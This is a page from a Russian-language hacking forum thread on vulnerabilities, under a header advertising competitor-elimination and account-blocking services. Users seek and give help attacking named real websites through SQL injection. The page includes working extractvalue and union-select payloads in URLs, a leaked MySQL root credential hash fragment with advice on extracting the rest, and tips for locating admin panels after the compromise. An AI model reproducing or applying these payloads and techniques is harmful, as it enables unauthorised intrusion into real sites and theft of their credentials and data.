УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 126 из 296

126

Опции темы

Поиск в этой теме

Опции просмотра

#1251

14.08.2016, 16:29

SaNDER

Guest

Сообщений: n/a

Провел на форуме:
51198

Репутация: 3

Вывел логин и пароль через xpath syntax error,ищу админку,нашёл токо phpmyadmin.

Ввожу данные и не подходят(пароль не хэш был,а незашифрованный!) .

Значит есть другая админка или проблема в другом?

Ошибка 1045 выводил . не удалось подключиться к mysql...

Apache/2.2.22 (@Release@) Yii Framework/1.1.15

#1252

15.08.2016, 10:36

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

Отправить сообщение для DezMond™ с помощью ICQ

Хелп, не получается раскрутить(

http://www.byggecentrum.dk/kurser/k...t/produkter/sortering/kursusdato'/?no_cache=1

#1253

16.08.2016, 02:09

Octavian

Guest

Сообщений: n/a

Провел на форуме:
97114

Репутация: 24

есть урл такого вида site.com:8082,site.com:8088...что означяет даные порты....если я взломая 1 попаду на обШии сервак? как Это работает?

#1254

16.08.2016, 08:06

Ereee

Guest

Сообщений: n/a

Провел на форуме:
102354

Репутация: 267

Цитата:

Сообщение от DezMond™

DezMond™ said:
↑
Хелп, не получается раскрутить(
http://www.byggecentrum.dk/kurser/k...t/produkter/sortering/kursusdato'/?no_cache=1

Легко и просто:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.byggecentrum.dk/kurser/kursuskategorier/handling/list/produkter/sortering/%60name%60,extractvalue(0x0a,concat(0x0a,(select+version())))--+g/?no_cache=1[/COLOR][/COLOR]

Только там с точками пробелы, но учитывая, что стоит на TYPO3, мне кажется структуру БД найти не будет проблемой.

Цитата:

Сообщение от Octavian

Octavian said:
↑
есть урл такого вида site.com:8082,site.com:8088...что означяет даные порты....если я взломая 1 попаду на обШии сервак? как Это работает?

Это может быть CPanel, ISPManager и т.д. Скорее всего хостинг, так что перспективы иметь доступ ко всему малы. Может повезет, и ядро ОС старое, тогда есть шансы на полный контроль. Но я бы посоветовал начинать с основ, типа PHP.

Цитата:

Сообщение от SaNDER

SaNDER said:
↑
Вывел логин и пароль через xpath syntax error,ищу админку,нашёл токо phpmyadmin.
Ввожу данные и не подходят(пароль не хэш был,а незашифрованный!) .
Значит есть другая админка или проблема в другом?
Ошибка 1045 выводил . не удалось подключиться к mysql...

PhpMyAdmin - утилита для подключения к базе данных. Пароль к нему подойдет, только если ты взял его из `mysql`.`user`.

Если пароль взят из другой таблицы, то определенно есть другая админка. Поищи еще.

Если есть стандартная форма авторизации, попробуй через нее, возможно ссылка на админку появится сама.

И да, Yii является фреймворком, а не CMS. Советую, тоже, основы.

#1255

17.08.2016, 16:23

demafly76

Guest

Сообщений: n/a

Провел на форуме:
6685

Репутация: 0

не понимаю обясните! можн ли как обойти, режет from и остальное.

в корне есть phpinfo

Код:

Code:
http://www.securmed.it/it/catalogo.php?cat=-3+union+select+1,version(),3+sec_categoria+--+

и еще вопрос что с этим делать, хех

No se puede ejecutar el query, error: XPATH syntax error: ':root:*4F23645A18ABD4FACEB00C9BC'

#1256

17.08.2016, 22:54

SaNDER

Guest

Сообщений: n/a

Провел на форуме:
51198

Репутация: 3

и еще вопрос что с этим делать, хех

No se puede ejecutar el query, error: XPATH syntax error: ':root:*4F23645A18ABD4FACEB00C9BC'[/QUOTE]

Цитата:

Сообщение от demafly76

demafly76 said:
↑
не понимаю обясните! можн ли как обойти, режет from и остальное.
в корне есть phpinfo

Код:

Code:
http://www.securmed.it/it/catalogo.php?cat=-3+union+select+1,version(),3+sec_categoria+--+

и еще вопрос что с этим делать, хех
No se puede ejecutar el query, error: XPATH syntax error: ':root:*4F23645A18ABD4FACEB00C9BC'

Это логин и пароль.Даже имя root само за себя говорит .

Как я понял ты через extractvalue вывоил?Там выводи в 31 символ наскоко я помню.

А hash на MySQL 5 в 40 символов .

#1257

17.08.2016, 23:31

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от SaNDER

SaNDER said:
↑
и еще вопрос что с этим делать, хех

Используйте функцию mid() для вывода первой части, а затем второй части пароля

#1258

18.08.2016, 07:53

SaNDER

Guest

Сообщений: n/a

Провел на форуме:
51198

Репутация: 3

http://dev.web3.6893-2.whserv.de/index.php?id=-347 .

Как обойти TYPO3?Тут версия 6.2.25

------------------------------------------------------------

Подключился через SH к айпи сервера . Как curl закачать ?

#1259

18.08.2016, 08:56

demafly76

Guest

Сообщений: n/a

Провел на форуме:
6685

Репутация: 0

Цитата:

Сообщение от SaNDER

SaNDER said:
↑
Это логин и пароль.Даже имя root само за себя говорит .
Как я понял ты через extractvalue вывоил?Там выводи в 31 символ наскоко я помню.
А hash на MySQL 5 в 40 символов .

да через extractvalue, а вот про вывод в 31 символ тут я не догнал с этим